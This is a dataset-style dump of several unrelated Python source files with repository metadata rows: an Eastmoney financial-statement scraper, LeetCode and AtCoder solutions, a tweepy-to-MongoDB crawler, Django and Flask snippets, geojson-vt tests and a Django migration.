url = f"https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/Index"
params = {"type": "web", "code": symbol.lower()}
r = requests.get(url, params=params)
soup = BeautifulSoup(r.text, "lxml")
company_type = soup.find(attrs={"id": "hidctype"})["value"]
return company_type
def stock_balance_sheet_by_report_em(symbol: str = "SH600519") -> pd.DataFrame:
"""
    Eastmoney - stock - financial analysis - balance sheet - by reporting period
    https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/Index?type=web&code=sh600519#lrb-0
    :param symbol: stock code with market identifier
    :type symbol: str
    :return: balance sheet by reporting period
:rtype: pandas.DataFrame
"""
company_type = _stock_balance_sheet_by_report_ctype_em(symbol=symbol)
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/zcfzbDateAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "0",
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
temp_df["REPORT_DATE"] = pd.to_datetime(temp_df["REPORT_DATE"]).dt.date
temp_df["REPORT_DATE"] = temp_df["REPORT_DATE"].astype(str)
need_date = temp_df["REPORT_DATE"].tolist()
sep_list = [",".join(need_date[i : i + 5]) for i in range(0, len(need_date), 5)]
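    # the report dates are queried in batches of five per request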
big_df = pd.DataFrame()
for item in tqdm(sep_list, leave=False):
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/zcfzbAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "0",
"reportType": "1",
"dates": item,
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
big_df = pd.concat([big_df, temp_df], ignore_index=True)
return big_df
def stock_balance_sheet_by_yearly_em(symbol: str = "SH600036") -> pd.DataFrame:
"""
    Eastmoney - stock - financial analysis - balance sheet - by year
    https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/Index?type=web&code=sh600519#lrb-0
    :param symbol: stock code with market identifier
    :type symbol: str
    :return: balance sheet by year
:rtype: pandas.DataFrame
"""
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/zcfzbDateAjaxNew"
company_type = _stock_balance_sheet_by_report_ctype_em(symbol)
params = {
"companyType": company_type,
"reportDateType": "1",
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
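    # fall back to companyType=3 when the first request returns no usable data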
try:
temp_df = pd.DataFrame(data_json["data"])
except:
company_type = 3
params.update({"companyType": company_type})
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
temp_df["REPORT_DATE"] = pd.to_datetime(temp_df["REPORT_DATE"]).dt.date
temp_df["REPORT_DATE"] = temp_df["REPORT_DATE"].astype(str)
need_date = temp_df["REPORT_DATE"].tolist()
sep_list = [",".join(need_date[i : i + 5]) for i in range(0, len(need_date), 5)]
big_df = pd.DataFrame()
for item in tqdm(sep_list, leave=False):
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/zcfzbAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "1",
"reportType": "1",
"dates": item,
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
big_df = pd.concat([big_df, temp_df], ignore_index=True)
return big_df
def stock_profit_sheet_by_report_em(symbol: str = "SH600519") -> pd.DataFrame:
"""
    Eastmoney - stock - financial analysis - income statement - by reporting period
    https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/Index?type=web&code=sh600519#lrb-0
    :param symbol: stock code with market identifier
    :type symbol: str
    :return: income statement by reporting period
:rtype: pandas.DataFrame
"""
company_type = _stock_balance_sheet_by_report_ctype_em(symbol=symbol)
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/lrbDateAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "0",
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
temp_df["REPORT_DATE"] = pd.to_datetime(temp_df["REPORT_DATE"]).dt.date
temp_df["REPORT_DATE"] = temp_df["REPORT_DATE"].astype(str)
need_date = temp_df["REPORT_DATE"].tolist()
sep_list = [",".join(need_date[i : i + 5]) for i in range(0, len(need_date), 5)]
big_df = pd.DataFrame()
for item in tqdm(sep_list, leave=False):
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/lrbAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "0",
"reportType": "1",
"code": symbol,
"dates": item,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
big_df = pd.concat([big_df, temp_df], ignore_index=True)
return big_df
def stock_profit_sheet_by_yearly_em(symbol: str = "SH600519") -> pd.DataFrame:
"""
    Eastmoney - stock - financial analysis - income statement - by year
    https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/Index?type=web&code=sh600519#lrb-0
    :param symbol: stock code with market identifier
    :type symbol: str
    :return: income statement by year
:rtype: pandas.DataFrame
"""
company_type = _stock_balance_sheet_by_report_ctype_em(symbol=symbol)
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/lrbDateAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "1",
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
temp_df["REPORT_DATE"] = pd.to_datetime(temp_df["REPORT_DATE"]).dt.date
temp_df["REPORT_DATE"] = temp_df["REPORT_DATE"].astype(str)
need_date = temp_df["REPORT_DATE"].tolist()
sep_list = [",".join(need_date[i : i + 5]) for i in range(0, len(need_date), 5)]
big_df = pd.DataFrame()
for item in tqdm(sep_list, leave=False):
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/lrbAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "1",
"reportType": "1",
"dates": item,
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
big_df = pd.concat([big_df, temp_df], ignore_index=True)
return big_df
def stock_profit_sheet_by_quarterly_em(
symbol: str = "SH600519",
) -> pd.DataFrame:
"""
    Eastmoney - stock - financial analysis - income statement - by single quarter
    https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/Index?type=web&code=sh600519#lrb-0
    :param symbol: stock code with market identifier
    :type symbol: str
    :return: income statement by single quarter
:rtype: pandas.DataFrame
"""
company_type = _stock_balance_sheet_by_report_ctype_em(symbol=symbol)
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/lrbDateAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "2",
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
temp_df["REPORT_DATE"] = pd.to_datetime(temp_df["REPORT_DATE"]).dt.date
temp_df["REPORT_DATE"] = temp_df["REPORT_DATE"].astype(str)
need_date = temp_df["REPORT_DATE"].tolist()
sep_list = [",".join(need_date[i : i + 5]) for i in range(0, len(need_date), 5)]
big_df = pd.DataFrame()
for item in tqdm(sep_list, leave=False):
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/lrbAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "0",
"reportType": "2",
"dates": item,
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
big_df = pd.concat([big_df, temp_df], ignore_index=True)
return big_df
def stock_cash_flow_sheet_by_report_em(
symbol: str = "SH600519",
) -> pd.DataFrame:
"""
    Eastmoney - stock - financial analysis - cash flow statement - by reporting period
    https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/Index?type=web&code=sh600519#lrb-0
    :param symbol: stock code with market identifier
    :type symbol: str
    :return: cash flow statement by reporting period
:rtype: pandas.DataFrame
"""
company_type = _stock_balance_sheet_by_report_ctype_em(symbol=symbol)
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/xjllbDateAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "0",
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
temp_df["REPORT_DATE"] = pd.to_datetime(temp_df["REPORT_DATE"]).dt.date
temp_df["REPORT_DATE"] = temp_df["REPORT_DATE"].astype(str)
need_date = temp_df["REPORT_DATE"].tolist()
sep_list = [",".join(need_date[i : i + 5]) for i in range(0, len(need_date), 5)]
big_df = pd.DataFrame()
for item in tqdm(sep_list, leave=False):
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/xjllbAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "0",
"reportType": "1",
"dates": item,
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
big_df = pd.concat([big_df, temp_df], ignore_index=True)
return big_df
def stock_cash_flow_sheet_by_yearly_em(
symbol: str = "SH600519",
) -> pd.DataFrame:
"""
    Eastmoney - stock - financial analysis - cash flow statement - by year
    https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/Index?type=web&code=sh600519#lrb-0
    :param symbol: stock code with market identifier
    :type symbol: str
    :return: cash flow statement by year
:rtype: pandas.DataFrame
"""
company_type = _stock_balance_sheet_by_report_ctype_em(symbol=symbol)
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/xjllbDateAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "1",
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
temp_df["REPORT_DATE"] = pd.to_datetime(temp_df["REPORT_DATE"]).dt.date
temp_df["REPORT_DATE"] = temp_df["REPORT_DATE"].astype(str)
need_date = temp_df["REPORT_DATE"].tolist()
sep_list = [",".join(need_date[i : i + 5]) for i in range(0, len(need_date), 5)]
big_df = pd.DataFrame()
for item in tqdm(sep_list, leave=False):
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/xjllbAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "1",
"reportType": "1",
"dates": item,
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
big_df = pd.concat([big_df, temp_df], ignore_index=True)
return big_df
def stock_cash_flow_sheet_by_quarterly_em(
symbol: str = "SH600519",
) -> pd.DataFrame:
"""
    Eastmoney - stock - financial analysis - cash flow statement - by single quarter
    https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/Index?type=web&code=sh600519#lrb-0
    :param symbol: stock code with market identifier
    :type symbol: str
    :return: cash flow statement by single quarter
:rtype: pandas.DataFrame
"""
company_type = _stock_balance_sheet_by_report_ctype_em(symbol=symbol)
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/xjllbDateAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "2",
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
temp_df["REPORT_DATE"] = pd.to_datetime(temp_df["REPORT_DATE"]).dt.date
temp_df["REPORT_DATE"] = temp_df["REPORT_DATE"].astype(str)
need_date = temp_df["REPORT_DATE"].tolist()
sep_list = [",".join(need_date[i : i + 5]) for i in range(0, len(need_date), 5)]
big_df = pd.DataFrame()
for item in tqdm(sep_list, leave=False):
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/xjllbAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "0",
"reportType": "2",
"dates": item,
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
big_df = pd.concat([big_df, temp_df], ignore_index=True)
return big_df
if __name__ == "__main__":
stock_balance_sheet_by_report_em_df = stock_balance_sheet_by_report_em(
symbol="SH600519"
)
print(stock_balance_sheet_by_report_em_df)
stock_balance_sheet_by_yearly_em_df = stock_balance_sheet_by_yearly_em(
symbol="SH601318"
)
print(stock_balance_sheet_by_yearly_em_df)
stock_profit_sheet_by_report_em_df = stock_profit_sheet_by_report_em(
symbol="SH600519"
)
print(stock_profit_sheet_by_report_em_df)
stock_profit_sheet_by_report_em_df = stock_profit_sheet_by_report_em(
symbol="SZ000001"
)
print(stock_profit_sheet_by_report_em_df)
stock_profit_sheet_by_yearly_em_df = stock_profit_sheet_by_yearly_em(
symbol="SH600519"
)
print(stock_profit_sheet_by_yearly_em_df)
stock_profit_sheet_by_quarterly_em_df = stock_profit_sheet_by_quarterly_em(
symbol="SH600519"
)
print(stock_profit_sheet_by_quarterly_em_df)
stock_cash_flow_sheet_by_report_em_df = stock_cash_flow_sheet_by_report_em(
symbol="SH600519"
)
print(stock_cash_flow_sheet_by_report_em_df)
stock_cash_flow_sheet_by_yearly_em_df = stock_cash_flow_sheet_by_yearly_em(
symbol="SH601398"
)
print(stock_cash_flow_sheet_by_yearly_em_df)
stock_cash_flow_sheet_by_quarterly_em_df = stock_cash_flow_sheet_by_quarterly_em(
symbol="SH601398"
)
print(stock_cash_flow_sheet_by_quarterly_em_df)
| UTF-8 | Python | false | false | 15,845 | py | 21 | stock_three_report_em.py | 20 | 0.616166 | 0.597361 | 0 | 412 | 35.783981 | 107 |
sushku/leetcode-py | 5,411,658,841,195 | 3d1d6935880a9739f6059449538c84554c9af892 | d141d6a9507c864ad335c56070882d4c5bf8b04c | /0011-container-with-most-water.py | a09edce72a035b7b0f92689d31900f4f41486756 | []
| no_license | https://github.com/sushku/leetcode-py | c692d0850c7cc175ae663ddbe6f682fec47dabaf | 997b89c985c1dcf8c4c6e3c607d6b1f0ac730a8b | refs/heads/master | 2021-01-19T02:40:58.322798 | 2017-03-26T06:24:56 | 2017-03-26T06:24:56 | 65,436,658 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | class Solution(object):
def maxArea(self, height):
"""
:type height: List[int]
:rtype: int
"""
i = 0
j = len(height) - 1
max_area = 0
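        # Two-pointer scan from both ends: the area is limited by the shorter
        # line, so always move the pointer at the shorter line inward.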
while i < j:
h = min(height[i], height[j])
area = h * (j - i)
max_area = max(area, max_area)
while height[i] <= h and i < j:
i += 1
while height[j] <= h and i < j:
j -= 1
return max_area
s = Solution()
print(s.maxArea([1,2,4,5,3,2]))
| UTF-8 | Python | false | false | 537 | py | 17 | 0011-container-with-most-water.py | 16 | 0.407821 | 0.387337 | 0 | 21 | 24.571429 | 43 |
csesoumita/TwitterDataAnalysis | 7,086,696,086,691 | 9b7edc305a0b8d4f7338797ea0f1f68a68913eef | 33ed6bf1f503e073ad1946216f337ec3caa9e3dd | /REST_API_Twitter.py | d1c90d5e055e495bd3612c9d51091868be18a706 | []
| no_license | https://github.com/csesoumita/TwitterDataAnalysis | f4a10311bdead268aa6b3438edba41453b98c4bc | 776cacc29b199bfa62b9e63dad77c5daa73650b2 | refs/heads/master | 2021-08-17T09:29:07.034056 | 2020-06-22T03:44:42 | 2020-06-22T03:44:42 | 195,810,180 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Program for Twitter Data Crawling via REST API using tweepy Start
import tweepy
from pymongo.mongo_client import MongoClient
class filter_Twitter:
# Accessing the Authentication Keys
API_key=""
API_secret_key = ""
Access_token = ""
Access_token_secret = ""
# Passing objects for Twitter Authentication
auth = tweepy.OAuthHandler(API_key, API_secret_key)
auth.set_access_token(Access_token, Access_token_secret)
api=tweepy.API(auth,wait_on_rate_limit=True)
#Insertion in Local Mongo DB
MONGO_HOST= 'mongodb://localhost/webscience'
client=MongoClient(MONGO_HOST)
db=client.webscience
#Tweets from own twitter account
public_tweets=api.home_timeline()
for tweet in public_tweets:
#db.twitter_search.insert(tweet._json)
print(tweet)
# Displaying own Twitter Details
user= api.me()
print("Name: "+user.name)
print ("Location:"+user.location)
print ("Screen Name:"+user.screen_name)
    # Search tweets from a specific Twitter user: Narendra Modi
    search = api.user_timeline(screen_name='NarendraModi')
    for status in search:
        db.twitter_search.insert_one(status._json)
    # Search tweets matching specific keywords (English only)
    hash_tag = 'Brexit OR weather'
    tweet_keyword = api.search(q=hash_tag, lang='en')
    for keywords in tweet_keyword:
        db.twitter_search.insert_one(keywords._json)
| UTF-8 | Python | false | false | 1,456 | py | 9 | REST_API_Twitter.py | 7 | 0.675824 | 0.675824 | 0 | 40 | 34.25 | 73 |
consaceves/csc210-project | 5,274,219,841,875 | bdc2e80cd37f4a2346c5a19dfee71fe87be77f7b | 2f4640dfec53a65a26d61b17b3684a34552374b2 | /tests/__init__.py | 1a6f474ad2169c94a7d392bda710adcd68c282d5 | []
| no_license | https://github.com/consaceves/csc210-project | e472242cdad81f643c18e471d204048f74de0939 | a199a0759f5939189de73ade60ef2cd4b2a94ae6 | refs/heads/master | 2022-12-11T11:32:03.041038 | 2019-12-11T00:41:12 | 2019-12-11T00:41:12 | 218,378,045 | 0 | 0 | null | false | 2022-12-08T01:50:18 | 2019-10-29T20:31:56 | 2019-12-11T00:41:21 | 2022-12-08T01:50:18 | 5,262 | 0 | 0 | 10 | HTML | false | false | import unittest
from app import create_app, db
class BaseTest(unittest.TestCase):
def create_app(self):
return create_app()
def setUp(self):
self.app = self.create_app()
self.client = self.app.test_client
with self.app.app_context():
from app import models
db.drop_all()
db.create_all()
def tearDown(self):
with self.app.app_context():
from app import models
db.session.remove()
db.drop_all()
if __name__ == '__main__':
unittest.main()
| UTF-8 | Python | false | false | 571 | py | 28 | __init__.py | 15 | 0.556918 | 0.556918 | 0 | 26 | 20.961538 | 42 |
sreejithev/pythoncodes | 627,065,248,120 | ab256fb06856c39f20bd0ab6481f67057ca71a48 | 5a4436884af5341ce855c0e84866b972a0f61c05 | /day4/classes/tests/a.py | 9bd7ba8bf794a4dc3d74485131ffd21b4c76d0be | []
| no_license | https://github.com/sreejithev/pythoncodes | 74a420c4f025b893e27f17ba85632a4a096f17fd | 70df14871a9687916d1c4ada76c055607f13e8ce | refs/heads/master | 2021-01-21T20:59:47.056167 | 2017-06-19T09:43:17 | 2017-06-19T09:43:17 | 92,292,259 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | dec = 567
print ("decimal value is",dec)
print (bin(dec),"in binary")
| UTF-8 | Python | false | false | 70 | py | 376 | a.py | 344 | 0.671429 | 0.628571 | 0 | 3 | 22.333333 | 30 |
uktrade/lite-exporter-frontend | 8,839,042,700,040 | dd64151b73b505878895f85493ff5089db3b982c | a402fc7de174d6610063e087ba2f82b658dca5f2 | /end_users/urls.py | 41f3d1f3cd830c88bbd2b064cf20dfbc115197d2 | [
"MIT"
]
| permissive | https://github.com/uktrade/lite-exporter-frontend | bdd8e1c3a40bbc82076f1253cab408974e23632d | cf42ac37a21236486aa303c8935c44a7eba91ef5 | refs/heads/master | 2021-07-15T04:32:22.105366 | 2020-07-24T09:47:31 | 2020-07-24T09:47:31 | 175,791,659 | 3 | 1 | MIT | false | 2020-08-05T10:20:10 | 2019-03-15T09:41:41 | 2020-07-24T09:47:35 | 2020-07-24T10:22:18 | 2,646 | 3 | 1 | 0 | Python | false | false | from django.urls import path
from end_users import views
app_name = "end_users"
urlpatterns = [
path("", views.EndUsersList.as_view(), name="end_users"),
path("<uuid:pk>/", views.EndUserDetailEmpty.as_view(), name="end_user"),
path("<uuid:pk>/copy-advisory/", views.CopyAdvisory.as_view(), name="copy"),
path("apply-for-an-advisory/", views.ApplyForAnAdvisory.as_view(), name="apply"),
path("<uuid:pk>/<str:type>/", views.EndUserDetail.as_view(), name="end_user_detail"),
]
| UTF-8 | Python | false | false | 497 | py | 320 | urls.py | 210 | 0.67002 | 0.67002 | 0 | 13 | 37.230769 | 89 |
judithnat/shoppingList | 15,427,522,530,844 | 289c8a38f78a20c758b5878a624ad02112d3288c | 262308480e2f7052592ee95580be672b54f03a8e | /shoplistapp/urls.py | 274a3f3e989db8753b78801e7ea088b239dafe5b | []
| no_license | https://github.com/judithnat/shoppingList | 9e2d930c6366b41df886623a5211f8be5476c04d | a1ab38c4f5b2bac1abb5fb2f37dccb63ef7cadec | refs/heads/master | 2020-03-24T15:31:04.064567 | 2018-07-29T21:46:08 | 2018-07-29T21:46:08 | 142,792,405 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.ItemList.as_view(), name='shop_list'),
url(r'^item/(?P<pk>\d+)/$', views.item_detail, name='item_detail'),
url(r'^item/new/$', views.ItemCreate.as_view(), name='item_new'),
url(r'^item/(?P<pk>\d+)/edit/$', views.item_edit, name='item_edit'),
]
"""
NB: r'...' marks a regular expression string
^ matches the beginning of the URL
$ matches the end of the URL
(?P<pk>...) assigns the result of this group to the variable named pk
""" | UTF-8 | Python | false | false | 454 | py | 12 | urls.py | 6 | 0.618943 | 0.618943 | 0 | 15 | 29.333333 | 72 |
krakowiakpawel9/live-python | 15,522,011,823,062 | 8fa34951c61966a497c4f2333451009ea35148ae | 1ab52d160b72f4b5bc6776175c1a8aaf3cb86e0a | /fb-posts/02_pathlib/18_pathlib.py | f1196f7066b3aa6b58c5d09aaacf5bcf6207dbec | []
| no_license | https://github.com/krakowiakpawel9/live-python | ea3598ceeafca827b53efdf71a6d3156a6fa25b4 | 237b186b48b51f58450290f5ed0146041e0a1135 | refs/heads/master | 2021-04-17T06:10:53.141136 | 2021-03-06T09:53:47 | 2021-03-06T09:53:47 | 249,418,666 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from pathlib import Path
base_dir = Path.cwd() / 'reports'
if not base_dir.is_dir():
base_dir.mkdir()
fnames = [f'{str(i).zfill(2)}_sales.txt' for i in range(1, 13)]
paths = [Path.cwd() / base_dir / f'{fname}' for fname in fnames]
for path in paths:
path.touch()
| UTF-8 | Python | false | false | 276 | py | 70 | 18_pathlib.py | 68 | 0.630435 | 0.615942 | 0 | 11 | 23.909091 | 64 |
elvesmrodrigues/Kcore_Expert_Finding | 7,387,343,788,475 | ff0f2ee460cd14ccfd86536ba89b58dde549d51d | f9efe2ce2325ad3d5d3c5762f3c85e51a2612ea8 | /expert_finding/script/content_embedding.py | 365ace7ec2d69b2eca78c26dd26881e380cbc565 | []
| no_license | https://github.com/elvesmrodrigues/Kcore_Expert_Finding | 3e3347fa77b51d81999fcac12ac9a7324568763e | c03174640f62771492805fb6cbb08f3d2ba6f88f | refs/heads/main | 2023-06-25T03:42:15.155785 | 2021-07-26T12:57:22 | 2021-07-26T12:57:22 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import expert_finding.script.finding_pipline as expert
import expert_finding.finetuning.network as net_model
import os
current_dir = os.path.dirname(os.path.abspath(__file__))
work_dir = os.path.join(current_dir, "output/data")
def content_embedding_finding():
    # `communities_path` was undefined in the original script; this assumed
    # location mirrors `work_dir` above and should be adjusted to your setup.
    communities_path = os.path.join(current_dir, "output/triples")
    models = ["tfidf", "GloVe", "sci_bert_nil_sts"]
    for model in models:
        # assumes ExpertFind is the class exposed by finding_pipline (imported as `expert`)
        finder = expert.ExpertFind("V1", work_dir, communities_path, "0", model)
        finder.preprocess()
        finder.offline_embedding(encoder_name=model)
        finder.evalutation(index=True, k=1000, encoder_name=model)
    finder = expert.ExpertFind("V2", "/ddisk/lj/DBLP/data/", "/ddisk/lj/triples", "0", "GloVe")
    finder.preprocess()
    # finder.offline_embedding(encoder_name="GloVe")
    finder.evalutation(index=True, k=1000, encoder_name="GloVe")
    #
    finder = expert.ExpertFind("V3", "/ddisk/lj/DBLP/data/", "/ddisk/lj/triples", "0", "sci_bert_nil_sts")
    finder.preprocess()
    # finder.offline_embedding(encoder_name="sci_bert_nil_sts")
    finder.evalutation(index=True, k=1000, encoder_name="sci_bert_nil_sts")
| UTF-8 | Python | false | false | 1,067 | py | 61 | content_embedding.py | 42 | 0.682287 | 0.665417 | 0 | 25 | 41.68 | 99 |
Aasthaengg/IBMdataset | 2,705,829,421,953 | db028e48eabea08f1691ba7f712dd730e9fdd144 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03167/s904500920.py | 57bd79e056e177c6d9f615c4ea73ddc64ad7fde5 | []
| no_license | https://github.com/Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import sys
from collections import defaultdict
readline = sys.stdin.buffer.readline
sys.setrecursionlimit(10**8)
def geta(fn=lambda s: s.decode()):
return map(fn, readline().split())
def gete(fn=lambda s: s.decode()):
return fn(readline().rstrip())
def main():
mod = 10**9 + 7
H, W = geta(int)
g = []
for _ in range(H):
g.append(gete())
dp = [[0] * W for _ in range(H)]
for i, gi in enumerate(g):
if i == 0:
w = gi.index("#") if "#" in gi else W
dp[0] = [1 if j < w else 0 for j in range(W)]
else:
for j, gij in enumerate(gi):
if gij == "#":
dp[i][j] = 0
else:
dp[i][j] = (dp[i - 1][j] +
(dp[i][j - 1] if j > 0 else 0)) % mod
print(dp[H - 1][W - 1])
if __name__ == "__main__":
main() | UTF-8 | Python | false | false | 898 | py | 202,060 | s904500920.py | 202,055 | 0.447661 | 0.426503 | 0 | 40 | 21.475 | 69 |
CUUATS/geojson-vt-py | 6,279,242,206,438 | aadeeb66ab4ba49a900f49a452b515e2a322516a | 05610a560d95ceec420600e4e001aa6614283a0d | /tests/test_full.py | dbbf0aa2d398d9663623f2c258c5e7b609b02d5d | [
"ISC"
]
| permissive | https://github.com/CUUATS/geojson-vt-py | 301b646ceda9bccf024f66ff962d89378a99a98e | e7b2d68a460679690375a034aae12553fea953dc | refs/heads/master | 2021-10-02T20:41:46.389173 | 2018-11-30T17:03:26 | 2018-11-30T17:03:26 | 119,899,784 | 0 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null | import unittest
from .gen_tiles import genTiles
from .utils import load_json, json_str
class TestFull(unittest.TestCase):
def _tiles_equal(self, inputFile, expectedFile, maxZoom=0,
maxPoints=10000):
tiles = genTiles(load_json(inputFile), maxZoom, maxPoints)
expected = load_json(expectedFile)
self.assertEqual(json_str(tiles), json_str(expected))
def test_tiles_us_states(self):
self._tiles_equal('us-states.json', 'us-states-tiles.json', 7, 200)
def test_tiles_dateline(self):
self._tiles_equal('dateline.json', 'dateline-tiles.json')
def test_tiles_feature(self):
self._tiles_equal('feature.json', 'feature-tiles.json')
def test_tiles_collection(self):
self._tiles_equal('collection.json', 'collection-tiles.json')
def test_tiles_single_geom(self):
self._tiles_equal('single-geom.json', 'single-geom-tiles.json')
def test_invalid_geojson(self):
with self.assertRaises(ValueError) as context:
genTiles({'type': 'Pologon'})
self.assertTrue('not a valid GeoJSON object' in str(context.exception))
def test_empty_geojson(self):
self.assertEqual(json_str(genTiles(load_json('empty.json'))), '{}')
def test_null_geometry(self):
# should ignore features with null geometry
self.assertEqual(json_str(genTiles(
load_json('feature-null-geometry.json'))), '{}')
if __name__ == '__main__':
unittest.main()
| UTF-8 | Python | false | false | 1,499 | py | 20 | test_full.py | 19 | 0.650434 | 0.643763 | 0 | 45 | 32.311111 | 79 |
marcosanchezdenis/laborapp-uc-back | 4,707,284,171,757 | 7e78ae807b5eab53aa2fdd96c0872b2ab988ac61 | 5c23d7c8c2ede17698c7a0111138ec6de7a9d315 | /network/migrations/0003_auto_20190210_1432.py | 9b25b5ec78a5c341aa9654aa3308952142657f35 | []
| no_license | https://github.com/marcosanchezdenis/laborapp-uc-back | 90d9326514292955901e2e90d099b42472da4475 | 0eb2b7843b36cc9666acd675b4badfe715692eee | refs/heads/master | 2020-05-07T21:19:02.759391 | 2019-04-12T00:32:52 | 2019-04-12T00:32:52 | 180,899,633 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Generated by Django 2.1.5 on 2019-02-10 14:32
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('network', '0002_customer_user'),
]
operations = [
migrations.AddField(
model_name='contacttype',
name='created_at',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='contacttype',
name='deleted_at',
field=models.DateTimeField(blank=True, default=None, null=True),
),
migrations.AddField(
model_name='contacttype',
name='updated_at',
field=models.DateTimeField(auto_now=True),
),
migrations.AddField(
model_name='request',
name='message',
field=models.TextField(default=''),
preserve_default=False,
),
migrations.AddField(
model_name='request',
name='requested_date',
field=models.DateTimeField(default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='request',
name='state',
field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to='network.RequestState'),
preserve_default=False,
),
migrations.AddField(
model_name='scoresystemvalue',
name='system',
field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to='network.ScoreSystem'),
preserve_default=False,
),
]
| UTF-8 | Python | false | false | 1,806 | py | 59 | 0003_auto_20190210_1432.py | 59 | 0.581949 | 0.570321 | 0 | 55 | 31.836364 | 119 |
rephus/django-rest-template | 17,428,977,297,311 | 044729e53fb2c4a1b340c76dde51db947d81118c | bfbf35361169bdd0daae677570aab5ef498eb99c | /project/todo/models.py | cfa4bff064905c02e1133f80595e633fabe9d8f4 | []
